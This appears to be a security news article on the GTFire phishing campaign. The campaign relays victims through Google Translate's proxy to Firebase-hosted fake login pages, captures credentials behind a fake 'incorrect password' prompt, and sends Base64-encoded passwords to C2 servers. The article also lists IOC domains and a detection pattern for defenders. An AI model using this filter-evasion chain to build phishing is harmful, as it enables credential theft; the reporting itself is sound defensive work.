A sophisticated phishing campaign known as GTFire is exploiting two of Google’s most trusted services, Firebase and Google Translate, to pilfer login credentials from unsuspecting victims globally. This alarming trend highlights how cybercriminals are increasingly leveraging legitimate infrastructure to bypass traditional security measures, making it significantly harder to detect and block malicious activities. The GTFire scheme enables phishing links to slip past email filters and web gateways by masquerading as legitimate Google-owned domains, leading victims to convincing fake login pages that ultimately steal their sensitive information.
The sheer scale of the GTFire operation is considerable. Intelligence gathered from exposed attacker-controlled command-and-control (C2) servers has revealed thousands of stolen credentials associated with over 1,000 organizations across more than 100 countries and over 200 industries. Mexico stands out with the highest number of confirmed victims, totaling 385, primarily within the manufacturing, education, and government sectors. The United States follows with 101 victims, then Spain with 67, India with 54, and Argentina with 50, indicating a widespread and diverse targeting strategy.
How GTFire Uses Google Services for Credential Theft
Analyst reports from Group-IB have identified GTFire as a meticulously organized and large-scale operation focused on credential harvesting. The attackers demonstrate a strategic approach by reusing phishing templates across various targeted brands with only minor modifications. This allows for rapid deployment and efficient management of a multi-step credential collection process across centralized servers. Stolen data is systematically organized by date, language, and the targeted service, suggesting a high degree of operational efficiency.
Investigators have identified over 120 unique phishing domains associated with this campaign, all employing naming conventions designed for swift infrastructure rotation. This tactic makes it challenging for security systems to keep up with and block the evolving network of malicious sites. The reach of GTFire is clearly global, with threat actors carefully customizing each phishing page to precisely mimic the visual identity of targeted brands. This meticulous attention to detail renders the fake login portals virtually indistinguishable from legitimate ones.
Once a victim submits their username and password on a compromised page, the GTFire scheme presents a seemingly innocuous “incorrect password” error, prompting the user to try again. Crucially, both submitted credentials are simultaneously captured in the background without the victim’s knowledge. This seamless redirect to the legitimate brand’s website after credential submission deliberately delays any immediate awareness of an attack, granting the attackers valuable time to exfiltrate the stolen data before the compromise is detected.
The GTFire campaign underscores a significant concern for cybersecurity professionals: the ease with which trusted infrastructure can be weaponized. Traditional methods of URL reputation checks and static blocklists prove insufficient when phishing links are hosted on established, reputable domains like those owned by Google. Brand impersonation remains one of the most potent social engineering tactics, and GTFire exemplifies its efficient global deployment.
The Technical Chain of Exploitation
The attack vector typically begins with a victim receiving a phishing email containing a malicious link that incorporates Google Translate’s domain (translate.goog). This URL serves as an invisible relay, channeling the user’s request through Google’s translation proxy infrastructure. This sophisticated redirection ultimately leads the victim to a phishing page hosted on Firebase’s platform.
Because the initial link points to a legitimate, Google-owned domain, email security gateways and web filters often fail to flag it as suspicious, allowing it to bypass standard security protocols. Firebase then hosts the final phishing pages, where attackers frequently register large numbers of randomly named *.web.app subdomains. These are rotated rapidly to hinder efforts to block them effectively.
Each phishing page is dynamically generated to display brand-specific logos and input fields. This is achieved through a reusable phishing framework that requires only minor cosmetic alterations for each new target. This efficiency in adaptation allows GTFire to scale its operations quickly and target a wide array of organizations.
Following the submission of credentials, the captured data is transmitted to attacker-controlled C2 servers via HTTP GET requests. Passwords are sent in a Base64-encoded format, accompanied by metadata such as the victim’s country of origin and browser language. The backend infrastructure for these C2 servers often leverages LiteSpeed Web Server instances, utilizing PHP-based collection scripts, which are commercially available tools that reduce operational overhead and accelerate deployment.
Organizations are strongly advised to implement phishing-resistant multi-factor authentication (MFA) solutions and conduct regular employee training focused on recognizing sophisticated phishing techniques, particularly those leveraging trusted services. Security teams should develop detection rules specifically to flag URL patterns that combine translate.goog with *.web.app domains. Additionally, continuous monitoring of trusted cloud platforms for instances of brand impersonation is crucial.
Sharing indicators of compromise (IOCs), including network IOCs such as jnhwzs.fyi and gnpnia.lat, along with file-based IOCs related to the All-in-1.php collection scripts, with relevant CERT communities is vital for containing the spread of this evolving campaign. Proactive information sharing and updating security protocols are essential in the ongoing battle against such advanced cyber threats.